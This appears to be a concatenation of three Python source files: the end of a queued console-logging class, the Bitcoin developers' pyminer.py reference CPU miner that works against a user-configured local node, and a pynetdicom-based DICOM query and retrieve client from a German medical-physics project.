got = False
msg = self._log_queue.get(timeout=3)
got = True
# 省点性能...这句暂时不要了
# if not isinstance(msg, MsLogMessage):
# print("invalid MsLogMessage object: {}".format(msg))
# continue
if self._do_real_log_write_sub(msg):
self._on_succeed()
else:
self._on_failed()
except queue.Empty:
continue
except Exception:
traceback.print_exc()
finally:
if got:
self._log_queue.task_done()
def _do_real_log_write_sub_(self, msg: MsLogMessage):
"""do the real log writing action"""
self._stdwritebuffer.append(msg.message)
if not self._timeok and len(self._stdwritebuffer) < 500:
return
try:
# sys.stdout.write(self._stdwritebuffer)
# print(len(self._stdwritebuffer))
sys.stdout.write('\n'.join(self._stdwritebuffer))
self._stdwritebuffer.clear()
# sys.stdout.writelines('{}\n'.format(msg.message))
# print(msg.message)
#print("console:" + str(cls._log_queue.empty()))
except Exception:
traceback.print_exc()
finally:
# with self._timeok_locker:
if self._timeok:
self._timeok = False
def _do_real_log_write_sub(self, msg: MsLogMessage):
"""do the real log writing action"""
# with self._stdwritebuffer_locker:
# self._stdwritebuffer.append(msg.message)
# if not self._timeok and len(self._stdwritebuffer) < 500:
# return
try:
# with self._stdwritebuffer_locker:
# tmp = '\n'.join(self._stdwritebuffer)
# sys.stdout.write(tmp+'\n')
# self._stdwritebuffer.clear()
print(msg.message)
# sys.stdout.write(self._stdwritebuffer)
# print(len(self._stdwritebuffer))
# sys.stdout.writelines('{}\n'.format(msg.message))
# print(msg.message)
# print("console:" + str(cls._log_queue.empty()))
except Exception:
traceback.print_exc()
finally:
# with self._timeok_locker:
if self._timeok:
self._timeok = False
def __flush_thread(self):
"""Flush per 0.5 seconds"""
while True:
try:
# sys.stdout.flush()
continue
except Exception:
traceback.print_exc()
finally:
time.sleep(2)
def _on_succeed(self):
pass
def _on_failed(self):
pass
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 7168
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
dicom.py
|
# -*- coding: utf-8 -*-
"""
There are two types of AEs:
* SCP (Service Class Provider) which can be thought of as a server
* SCU (Service Class User) as a client.
CHANGELOG
=========
0.1.2 / 2021-05-19
------------------
- change debug messages
0.1.1 / 2021-04-27
------------------
- enables dicom calls via pynetdicom
0.1.0 / 2021-01-16
------------------
- First Release
"""
__author__ = "R. Bauer"
__copyright__ = "MedPhyDO - Machbarkeitsstudien des Instituts für Medizinische Strahlenphysik und Strahlenschutz am Klinikum Dortmund im Rahmen von Bachelor und Masterarbeiten an der TU-Dortmund / FH-Dortmund"
__credits__ = ["R.Bauer", "K.Loot"]
__license__ = "MIT"
__version__ = "0.1.2"
__status__ = "Prototype"
import os
import os.path as osp
import json
from typing import List
from blinker import signal
import threading
import queue
from pydicom.dataset import Dataset
from pydicom import dcmread
from pydicom.uid import generate_uid
from pynetdicom import (
AE,
debug_logger,
build_role,
evt,
AllStoragePresentationContexts,
ALL_TRANSFER_SYNTAXES,
QueryRetrievePresentationContexts
)
# was soll die Klassen können
from pynetdicom.sop_class import (
PatientRootQueryRetrieveInformationModelFind,
PatientRootQueryRetrieveInformationModelMove,
PatientRootQueryRetrieveInformationModelGet,
StudyRootQueryRetrieveInformationModelFind,
StudyRootQueryRetrieveInformationModelMove,
StudyRootQueryRetrieveInformationModelGet,
PatientStudyOnlyQueryRetrieveInformationModelFind,
PatientStudyOnlyQueryRetrieveInformationModelMove,
PatientStudyOnlyQueryRetrieveInformationModelGet,
CTImageStorage,
RTImageStorage,
XRayRadiationDoseSRStorage,
SecondaryCaptureImageStorage # CT-summary
)
from pynetdicom import sop_class
#debug_logger()
import logging
logger = logging.getLogger( "MQTT" )
#logger.level = 10 # 0 - NOTSET, 10 - DEBUG, 20 - INFO, 30 - WARNING, 40 - ERROR, 50 - CRITICAL
# defaults für die query Rückgaben diese sind gestaffelt IMAGE beinhaltet alle davor
#
dicomQueryDefaults = {
"PATIENT": {
"QueryRetrieveLevel": "PATIENT",
"PatientID": "*",
"PatientName": None,
"PatientBirthDate": None,
},
"STUDY": {
"QueryRetrieveLevel": "STUDY",
"StudyInstanceUID": None,
"StudyID": None,
"StudyDate": None,
"StudyTime": None,
"Modality": None,
"StudyDescription": None,
"AccessionNumber": None
},
"SERIES": {
"QueryRetrieveLevel": "SERIES",
"SeriesInstanceUID": None,
"Modality": None,
"SeriesNumber": None,
"StationName": None,
},
"IMAGE": {
"QueryRetrieveLevel": "IMAGE",
"SOPClassUID": None,
"SOPInstanceUID": None,
"StationName": None,
"InstanceNumber": None,
"ManufacturerModelName": None,
"ProtocolName": None,
"ExposureTime": None,
"KVP": None,
"ContentDate": None,
"ContentTime": None,
"XRayTubeCurrent": None
}
}
class ispDicom( ):
"""Dicom Klasse zum Abfragen eines Dicom servers.
Attributes
----------
dicomPath : str
Pfad zu den Dicom Dateien
server : str
Der zu verwendende DICOM Server aus config.json
ae : AE
Application Entity
assoc : <associate>
Die Verbindung zum Dicom Server Subklasse von threading.Thread
scp :
Der server zum empfangen der Daten
override: bool
Dicomfiles neu anlegen
messageId : int
id der laufenden abfrage
"""
def __init__( self, server="VMSDBD", config=None ):
"""Klasse initialisieren
Sicherstellen das in dicomPath ein gültiger Pfad liegt
query_model::
- ``P`` - Patient Root Information Model
- ``S`` - Study Root Information Model
- ``O`` - Patient Study Only Information Model
"""
# Klassen defaults
self.dicomPath: str = None
self.server: str = None
self.ae: AE = None
self.implementation_class_uid = generate_uid()
self.supported_context: List[str] = [
sop_class.RTImageStorage,
sop_class.XRayRadiationDoseSRStorage,
sop_class.SecondaryCaptureImageStorage,
sop_class.CTImageStorage,
]
self.assoc = None
self.request_mode = "c_move" # c_get
self.request_query_model = "S"
self.scp = None
self.override: bool = False
self.subPath: str = ""
self.messageId = 0
# konfiguration verwenden oder einlesen liegt in self.config
if config:
self.config = config
self.server=server
self.initialized = False
# pfad zu den dicom dateien bereitstellen default: {{BASE_DIR}}/files/DICOM
self.dicomPath = str( self.config.get( ["dicom", self.server, "local_dir"], "", replaceVariables=True ) )
if self.dicomPath == "": # pragma: no cover
self.dicomPath = os.path.abspath( osp.join( str(self.config.BASE_DIR), "files", "dicom" ) )
self.config.dicom[self.server]["local_dir"] = self.dicomPath
if not os.path.isdir(self.dicomPath): # pragma: no cover
logger.debug('dicomClass.initAE: erzeuge dirname={}'.format( self.dicomPath ) )
try:
os.makedirs( self.dicomPath )
except (OSError, IOError) as e: # pragma: no cover
msg = 'dicomClass.initAE: Fehler beim erzeugen von: {}'.format( self.dicomPath )
logger.error( msg )
self.appError( msg, e )
if os.access(self.dicomPath, os.W_OK) is True:
self.initialized = True
else: # pragma: no cover
msg = 'dicomClass.initAE: keine Schreibrechte auf: {}'.format( self.dicomPath )
logger.error( msg )
self.appError( msg )
def __del__(self):
"""Deleting Class (Calling destructor)
"""
self.closeAE()
def initAE( self ):
"""Application Entity bereitstellen
Status Codes: Non-service specific - 0xC000 to 0xC0FF
Verwendete evt_handlers::
* EVT_ESTABLISHED
* EVT_REJECTED
* EVT_RELEASED
Returns
-------
status : hex
- 0x0000 - alles OK
- 0xC0FF -Verbindung fehlgeschlagen
"""
# sicherheitshalber bestehende schließen
self.closeAE()
# Initialise the Application Entity
assoc = None
try:
# Initialise the Application Entity
aet = self.config.dicom[self.server]["aet"]
self.ae = AE( ae_title=aet )
# Patient Suche verwenden
self.ae.requested_contexts = QueryRetrievePresentationContexts
# patient level
self.ae.add_requested_context( PatientRootQueryRetrieveInformationModelFind )
self.ae.add_requested_context( PatientRootQueryRetrieveInformationModelMove )
self.ae.add_requested_context( PatientRootQueryRetrieveInformationModelGet )
# Study level
self.ae.add_requested_context( StudyRootQueryRetrieveInformationModelFind )
self.ae.add_requested_context( StudyRootQueryRetrieveInformationModelMove )
self.ae.add_requested_context( StudyRootQueryRetrieveInformationModelGet )
# patientStudyOnly
self.ae.add_requested_context( PatientStudyOnlyQueryRetrieveInformationModelFind )
self.ae.add_requested_context( PatientStudyOnlyQueryRetrieveInformationModelMove )
self.ae.add_requested_context( PatientStudyOnlyQueryRetrieveInformationModelGet )
# Add the requested presentation context (Storage SCP)
self.ae.add_requested_context( CTImageStorage )
self.ae.add_requested_context( XRayRadiationDoseSRStorage )
# use all Storages and Transfers
storage_sop_classes = [
cx.abstract_syntax for cx in AllStoragePresentationContexts
]
for uid in storage_sop_classes:
self.ae.add_supported_context(uid, ALL_TRANSFER_SYNTAXES)
# bei den handlern wird nicht auf EVT_REJECTED geprüft, da offline ja möglich ist
handlers=[
( evt.EVT_ESTABLISHED , self.handle_EVENT),
#( evt.EVT_REJECTED , self.handle_event),
( evt.EVT_RELEASED, self.handle_EVENT),
# für send_c_get
( evt.EVT_C_STORE, self.handle_STORE),
]
# requestmode für den server festlegen: c_move oder c_get
self.request_mode = self.config.get( ["dicom", self.server, "request_mode"], "c_move" )
# request_query_model für den server festlegen: P-patient S-series O-PS only
self.request_query_model = self.config.get( ["dicom", self.server, "request_query_model"], "S" )
# Create an SCP/SCU Role Selection Negotiation item for CT Image Storage
roles = []
roles.append( build_role(CTImageStorage, scp_role=True, scu_role=True ) )
roles.append( build_role(XRayRadiationDoseSRStorage, scp_role=True, scu_role=True) )
# Associate with peer AE
assoc = self.ae.associate(
self.config.dicom[self.server]['server_ip'],
self.config.dicom[self.server]['server_port'],
ae_title=self.config.dicom[self.server]['aec'],
evt_handlers=handlers,
ext_neg=roles
)
except: # pragma: no cover
pass
self.assoc = None
status = 0xC0FF
if assoc and assoc.is_established:
self.assoc = assoc
status = 0x0000
logger.debug('dicomClass.initAE: Verbindung hergestellt')
else: # pragma: no cover
logger.warning('dicomClass.initAE: Association rejected, aborted or never connected')
return status
def _start_server(self, evt_name:str="EVT_C_STORE"):
# EVT_C_STORE oder EVT_C_FIND
# Verbindung ggf herstellen
if not self.assoc:
status = self.initAE()
# und testen
if not self.assoc: # pragma: no cover
logger.warning("dicomClass._retrieve: Verbindung fehlgeschlagen")
signal( 'dicom.{}'.format( evt_name ) ).send( {
"name": evt_name,
'_is_cancelled': True,
"status": status,
"msg" : "initAE: Verbindung fehlgeschlagen",
# "dataset": None,
} )
return status
# wenn noch nicht passiert server zum empfangen der daten starten
if not self.scp:
# message id zurpcksetzen
self.messageId = 0
#print( self.scp )
# handler zum empfang der Daten bereitstellen
handlers = [
( evt.EVT_C_STORE, self.handle_STORE),
( evt.EVT_ACCEPTED, self.handle_EVENT),
( evt.EVT_ABORTED, self.handle_EVENT),
( evt.EVT_REJECTED, self.handle_EVENT),
( evt.EVT_RELEASED, self.handle_EVENT),
( evt.EVT_REQUESTED, self.handle_EVENT),
( evt.EVT_DIMSE_SENT, self.handle_EVENT),
( evt.EVT_DIMSE_RECV, self.handle_EVENT),
]
# Server starten um die Daten zu empfangen storage SCP on port listen_port
self.ae.ae_title = self.config.dicom[self.server]['aet']
sig_msg = None
try:
logger.debug( "dicomClass._start_server: start server" )
# If set to non-blocking then a running ``ThreadedAssociationServer``
# instance will be returned. This can be stopped using ``shutdown()``.
self.scp = self.ae.start_server(
('', self.config.dicom[self.server]['listen_port']),
block=False, # Abfrage über Thread handlers
evt_handlers=handlers
)
except OSError as e: # pragma: no cover
#print( "dicomClass.retrieve: 0xC515 - {}".format( str(e) ) )
logger.error( "dicomClass._start_server: 0xC515 - {}".format( str(e) ) )
sig_msg = {
"name": evt_name,
"_is_cancelled": True,
"status": 0xC515,
"msg" : "{}".format( str(e) )
}
except: # pragma: no cover
logger.error( "dicomClass._retrieve: ERROR start listen server" )
sig_msg = {
"name": evt_name,
"_is_cancelled": True,
"status": 0xC515,
"msg" : "Fehler bei start listen server"
}
# send signal on error
if not sig_msg == None:
signal( 'dicom.{}'.format( evt_name ) ).send( sig_msg )
return 0xC515
return 0x0000
def closeAE( self, status=0x0000 ):
"""shutdown scp und Release association.
Parameters
----------
status : int, optional
Grund des closeAE mitgeben. The default is 0x0000.
Returns
-------
None.
"""
done = {
"scp": "",
"assoc": "",
"ae": "",
}
do = 0
# shutdown scp - empfangen
if self.scp:
self.scp.shutdown()
self.scp = None
done["scp"] = "shutdown()"
do += 1
# release assoc
if self.assoc:
self.assoc.release()
self.assoc = None
done["assoc"] = "release()"
do += 1
# shutdown ae
if self.ae:
self.ae.shutdown()
self.ae = None
done["ae"] = "shutdown()"
do += 1
if do > 0:
logger.debug('dicomClass.closeAE: {}'.format( json.dumps( done ) ) )
return done
def getInfo( self ):
"""Wie print( self.ae ) gibt aber ein object zurück
Returns
-------
obj : dict
dict mit Server Informationen.
"""
obj = {
"dicomPath": self.dicomPath
}
if self.ae:
obj["title"] = self.ae.ae_title
obj["active_associations"] = len(self.ae.active_associations)
obj["maximum_associations"] = self.ae.maximum_associations
obj["acse_timeout"] = self.ae.acse_timeout
obj["dimse_timeout"] = self.ae.dimse_timeout
obj["network_timeout"] = self.ae.network_timeout
obj["associations"] = []
for assoc in self.ae.active_associations:
associations = {
"ae_title" : assoc.remote['ae_title'],
"address" : assoc.remote['address'],
"port" : assoc.remote['port'],
"accepted_contexts" : []
}
for cx in assoc.accepted_contexts:
#print( "cx", cx )
associations["accepted_contexts"].append( {
"Context" : cx.abstract_syntax,
"SCP_role" : cx.as_scp,
"SCU_role" : cx.as_scu
})
obj["associations"].append( associations )
return obj
def handle_EVENT(self, event):
"""Event Verarbeitung
sendet in evt_handlers definierte events über signal weiter
Parameters
----------
event : pynetdicom.evt
Ein von pynetdicom gesendeter event.
Returns
-------
None.
"""
logger.info('dicomClass.handle_EVENT: {}'.format( event.event.name ) )
signal( 'dicom.{}'.format( event.event.name ) ).send( {
"name": event.event.name,
"event": event,
"status":0x0000,
"msg":""
} )
def handle_STORE(self, event ):
"""Handle a C-STORE request event.
Dicom Daten empfangen und speichern
https://pydicom.github.io/pynetdicom/stable/reference/status.html
Status Codes: C-MOVE related - 0xC500 to 0xC5FF
Parameters
----------
event : TYPE
DESCRIPTION.
Returns
-------
status : hex
- 0x0000 - alles OK
- 0xC511 - Unhandled exception raised by the handler bound to evt.EVT_C_MOVE
- 0xC512
"""
logger.debug('dicomClass.handle_STORE')
ds = event.dataset
context = event.context
status = 0x0000
# Ort der Dicomdaten bestimmen
local_path = osp.join( self.dicomPath, self.subPath )
# ggf anlegen
if not os.path.isdir( local_path ):
logger.debug('dicomClass.handle_STORE: erzeuge subdir={}'.format( local_path ) )
os.makedirs( local_path )
# Datei schon vorhanden, oder nicht
exists, filename = self.archive_hasSOPInstanceUID( ds.SOPInstanceUID )
logger.debug( "dicomClass.handle_STORE: {}".format( ds.SOPInstanceUID + ".dcm" ) )
msg = ""
# DICOM Daten schreiben
if not exists or self.override:
# Wie werden die Bilddaten inerpretiert
ds.is_little_endian = True
ds.is_implicit_VR = True
# Datei speichern
# write_like_original=False um DCIM zu schreiben
try:
ds.save_as( filename , write_like_original=False )
msg = "Datei abgelegt: {}".format( filename )
except IOError as e: # pragma: no cover
# 0xC511 - Unhandled exception raised by the user’s implementation of the on_c_move callback
status = 0xC511
msg = "io_error: {}".format( str(e) )
logger.warning( "dicomClass.handle_STORE(io_error) [{}]: {}".format(status, filename ) )
except: # pragma: no cover
status = 0xC512
msg = "io_error: {}".format( filename )
logger.warning( "dicomClass.handle_STORE(save_error) [{}]: {}".format(status, filename ) )
else: # pragma: no cover
logger.debug( "Datei vorhanden: {}".format( filename ) )
msg = "Datei vorhanden: {}".format( filename )
logger.debug( "dicomClass.handle_STORE: {}".format( ds.SOPInstanceUID + ".dcm" ) )
signal( 'dicom.EVT_C_STORE' ).send( {
"name": event.event.name,
"_is_cancelled": False,
"dataset":ds,
"status":status,
"msg":msg
} )
return status
def echo(self):
"""
https://github.com/pydicom/pynetdicom/issues/419
Returns
-------
None.
"""
from pynetdicom.sop_class import VerificationSOPClass
#debug_logger()
# Initialise the Application Entity
ae = AE( ae_title=self.config.dicom[self.server]["aet"] )
ae.add_requested_context(VerificationSOPClass)
# qr_addr: the IP address of the QR SCP, as `str`
# qr_port: the port that the QR SCP is listening on as `int`
assoc = ae.associate(
addr = self.config.dicom[self.server]['server_ip'],
port = self.config.dicom[self.server]['server_port']
)
if assoc.is_established:
status = assoc.send_c_echo()
print( "status", status )
assoc.release()
else:
print( "not established")
def query( self, ds=None ):
"""Führt eine DICOM Abfrage durch.
Parameters
----------
ds : Dataset
Dataset für die Suche und Rückgabe. The default is None.
Returns
-------
results : list
gefundene daten
status : hex
Rückgabecode von send_c_find::
C-FIND related - 0xC300 to 0xC3FF
Zusätzlich:
- 0xC3F1 - keine PatientID
- 0xC0FF - initAE: Verbindung fehlgeschlagen
"""
results = []
if not ds: # pragma: no cover
logger.warning("dicomClass.query: kein Dataset")
return results, 0xC3F1
# Verbindung ggf herstellen
if not self.assoc:
status = self.initAE()
# und testen
if not self.assoc: # pragma: no cover
#print("dicomClass.query: Verbindung fehlgeschlagen")
logger.warning("dicomClass.query: Verbindung fehlgeschlagen")
return results, status
logger.warning("dicomClass.query: Abfrage durchführen")
# Abfrage durchführen
responses = self.assoc.send_c_find(
ds,
query_model=PatientRootQueryRetrieveInformationModelFind
)
# Rückgabe auswerten
for (response_status, rds) in responses:
# status code bestimmen
status = 0xC3F3
if response_status:
status = response_status.Status
# je nach status
if status in (0xFF00, 0xFF01) and rds:
# If the status is 'Pending' then `identifier` is the C-FIND response
results.append( rds )
elif status == 0x0000:
# abfrage wurde komplett durchgeführt
# print("identifier:", identifier)
pass
else: # pragma: no cover
#print('dicomClass.query: Connection timed out, was aborted or received invalid response: 0x{0:04x}'.format( status ))
logger.warning('dicomClass.query: Connection timed out, was aborted or received invalid response: 0x{0:04x}'.format( status ) )
return results, status
def PATIENT( self, query:dict={} ):
"""Führt eine suche nach PATIENT durch.
Wie query mit einem default Dataset
Parameters
----------
query : dict, optional
query parameter für ds. The default is {}.
Returns
-------
results : list
gefundene daten
status : hex
Rückgabecode von send_c_find::
"""
ds_model = dicomQueryDefaults["PATIENT"].copy()
ds_model.update( query )
ds = Dataset()
for name, value in ds_model.items():
ds.__setattr__(name, value)
# Abfrage durchführen
return self.query( ds )
def STUDY( self, query:dict={} ):
"""Führt eine suche nach STUDY durch.
Wie query mit einem default Dataset
Parameters
----------
query : dict, optional
query parameter für ds. The default is {}.
Returns
-------
results : list
gefundene daten
status : hex
Rückgabecode von send_c_find::
"""
ds_model = dicomQueryDefaults["PATIENT"].copy()
ds_model.update( dicomQueryDefaults["STUDY"] )
ds_model.update( query )
ds = Dataset()
for name, value in ds_model.items():
ds.__setattr__(name, value)
# Abfrage durchführen
return self.query( ds )
def SERIES( self, query:dict={} ):
"""Führt eine suche nach SERIES durch.
Wie query mit einem default Dataset
Parameters
----------
query : dict, optional
query parameter für ds. The default is {}.
Returns
-------
results : list
gefundene daten
status : hex
Rückgabecode von send_c_find::
"""
ds_model = dicomQueryDefaults["PATIENT"].copy()
ds_model.update( dicomQueryDefaults["STUDY"] )
ds_model.update( dicomQueryDefaults["SERIES"] )
ds_model.update( query )
ds = Dataset()
for name, value in ds_model.items():
ds.__setattr__(name, value)
# Abfrage durchführen
return self.query( ds )
def IMAGE( self, query:dict={} ):
"""Führt eine suche nach IMAGE durch.
Wie query mit einem default Dataset
Parameters
----------
query : dict, optional
query parameter für ds. The default is {}.
Returns
-------
results : list
gefundene daten
status : hex
Rückgabecode von send_c_find::
"""
ds_model = dicomQueryDefaults["PATIENT"].copy()
ds_model.update( dicomQueryDefaults["STUDY"] )
ds_model.update( dicomQueryDefaults["SERIES"] )
ds_model.update( dicomQueryDefaults["IMAGE"] )
ds_model.update( query )
ds = Dataset()
for name, value in ds_model.items():
ds.__setattr__(name, value)
# Abfrage durchführen
return self.query( ds )
def _retrieve( self, PatientID:str=None,
StudyInstanceUID:str=None,
SeriesInstanceUID:str=None,
SOPInstanceUID:str=None,
override:bool=False,
subPath:str="",
ds=None
):
'''DICOM Datensätze vom Server holen
Parameters
----------
PatientID : str, optional
Eine PatientenID. The default is None.
StudyInstanceUID : str, optional
Eine StudyInstanceUID. The default is None.
SeriesInstanceUID : str, optional
Eine SeriesInstanceUID. The default is None.
SOPInstanceUID : str, optional
Eine SOPInstanceUID. The default is None.
override : bool, optional
das holen der Daten über einen externen Aufruf machen.
wird von getdicom.py verwendet und dort auf False gesetzt. The default is False.
subPath : str, optional
ergänzt den lokalen Ablageort um subPath
ds : Dataset, optional
Angaben des Dataset statt PatientID, StudyInstanceUID, SeriesInstanceUID oder SOPInstanceUID verwenden
evt_handlers
------------
EVT_C_STORE
EVT_REJECTED
EVT_ACCEPTED
EVT_ABORTED
Signals
-------
dicom.EVT_C_STORE
Returns
-------
status : Dicom Status
- 0x0000 - daten vorhanden/gelesen | load archive | run EVT_C_STORE
- 0xC5F1 - keine PatientID
- 0xC0FF - initAE: Verbindung fehlgeschlagen
- 0xC512 -
- 0xC515 - Address/Port already in use
'''
# override Status merken
self.override = override
# subPath merken
self.subPath = subPath
if not ds:
# Create our Identifier (query) dataset
ds = Dataset()
#auf welchem Level soll abgefragt werden
#ds.QueryRetrieveLevel = 'SERIES'
if PatientID:
ds.QueryRetrieveLevel = 'PATIENT'
# Unique key for PATIENT level
ds.PatientID = PatientID
# Unique key for STUDY level
if StudyInstanceUID:
ds.QueryRetrieveLevel = 'STUDY'
ds.StudyInstanceUID = str(StudyInstanceUID)
# Unique key for SERIES
if SeriesInstanceUID:
ds.QueryRetrieveLevel = 'SERIES'
ds.SeriesInstanceUID = str(SeriesInstanceUID)
# Unique key for IMAGE
if SOPInstanceUID:
ds.QueryRetrieveLevel = 'IMAGE'
ds.SOPInstanceUID = str(SOPInstanceUID)
ds.Modality = 'RTIMAGE'
# print( "do - retreive ds:\n", ds)
# info QueryRetrieveLevel ausgeben
logger.debug( "dicomClass._retrieve: QueryRetrieveLevel {}".format( ds.QueryRetrieveLevel ) )
# bei image level versuchen aus dem Dateiarchiv zu lesen statt vom Server zu holen
# fixme - bei Angabe von SOPInstanceUID statt QueryRetrieveLevel
if ( hasattr(ds, 'SOPInstanceUID')) and not ds.SOPInstanceUID == None and not override:
#if ds.QueryRetrieveLevel == 'IMAGE' and not override:
# info
logger.debug( "dicomClass._retrieve: search archive {}".format( ds.SOPInstanceUID ) )
# file aus dem archiv laden
instance = self.archive_loadSOPInstanceUID( ds.SOPInstanceUID )
# konnte gelesen werden dann raus hier
if instance:
logger.debug( "dicomClass._retrieve: load archive {}".format( ds.SOPInstanceUID ) )
signal( 'dicom.EVT_C_STORE').send( {
"name": "EVT_C_STORE",
'_is_cancelled': False,
"status":0x0000,
"msg" : "load archive",
"dataset": instance, # Dataset mitgeben (fertig)
} )
return 0x0000
else:
logger.info( "dicomClass._retrieve: no archive {}".format( ds.SOPInstanceUID ) )
#
# ansonsten wird hier versucht neu zu laden
#
status = self._start_server("EVT_C_STORE")
if not status == 0x000:
return status
# print( "dicomClass.assoc.send_c_xxx", self.assoc.is_established, self.scp, self.assoc )
# ohne try
'''
convert PSO to UID
- ``P`` - 1.2.840.10008.5.1.4.1.2.1.2 -
*Patient Root Information Model - MOVE*
- ``S`` - 1.2.840.10008.5.1.4.1.2.2.2 -
*Study Root Information Model - MOVE*
- ``O`` - 1.2.840.10008.5.1.4.1.2.3.2 -
*Patient Study Only Information Model - MOVE*
'''
# Retrieve Error
result = 0xC512
responses = None
self.messageId += 1
if self.request_mode == "c_get":
query_model = StudyRootQueryRetrieveInformationModelGet
if self.request_query_model == "P":
query_model= PatientRootQueryRetrieveInformationModelGet
elif self.request_query_model == "O":
query_model= PatientStudyOnlyQueryRetrieveInformationModelGet
# c_get durchführen
if self.assoc.is_established:
responses = self.assoc.send_c_get(
ds,
query_model = query_model,
msg_id = self.messageId
)
else:
print( "dicomClass._retrieve send_c_get(): assoc is not established" )
else:
query_model = StudyRootQueryRetrieveInformationModelMove
if self.request_query_model == "P":
query_model= PatientRootQueryRetrieveInformationModelMove
elif self.request_query_model == "O":
query_model= PatientStudyOnlyQueryRetrieveInformationModelMove
# c_move durchführen
if self.assoc.is_established:
responses = self.assoc.send_c_move(
ds,
self.config.dicom[self.server]['aet'],
query_model = query_model,
msg_id = self.messageId
)
else:
print( "dicomClass._retrieve send_c_move(): assoc is not established" )
if responses:
i = 0
for (status, identifier) in responses:
i += 1
if status:
result = status.Status
